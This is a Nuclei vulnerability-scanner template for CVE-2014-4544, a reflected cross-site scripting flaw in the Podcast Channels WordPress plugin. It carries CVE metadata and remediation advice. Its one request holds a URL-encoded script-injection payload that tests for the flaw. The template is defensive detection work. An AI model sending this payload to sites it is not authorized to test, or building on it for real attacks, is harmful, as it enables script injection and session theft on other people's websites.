nuclei-templates/http/cves/2014/CVE-2014-4544.yaml

51 lines
2.0 KiB
YAML

id: CVE-2014-4544
info:
name: Podcast Channels < 0.28 - Cross-Site Scripting
author: daffainfo
severity: medium
description: The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Update to the latest version of the Podcast Channels plugin (0.28 or higher) to fix this vulnerability.
reference:
- https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb
- https://nvd.nist.gov/vuln/detail/CVE-2014-4544
- http://codevigilant.com/disclosure/wp-plugin-podcast-channels-a3-cross-site-scripting-xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2014-4544
cwe-id: CWE-79
epss-score: 0.00118
epss-percentile: 0.45488
cpe: cpe:2.3:a:podcast_channels_project:podcast_channels:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: podcast_channels_project
product: podcast_channels
framework: wordpress
tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth,podcast_channels_project
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 490a004630440220078759a06ea361276eb0cfd93bdd686cc6a0d4efa87b282c90531a3f9ac199e402204e90184620d595a421ed934c84affd49e89d27945d56eeb33bdd981da2c147fc:922c64590222798bb761d5b6d8e72950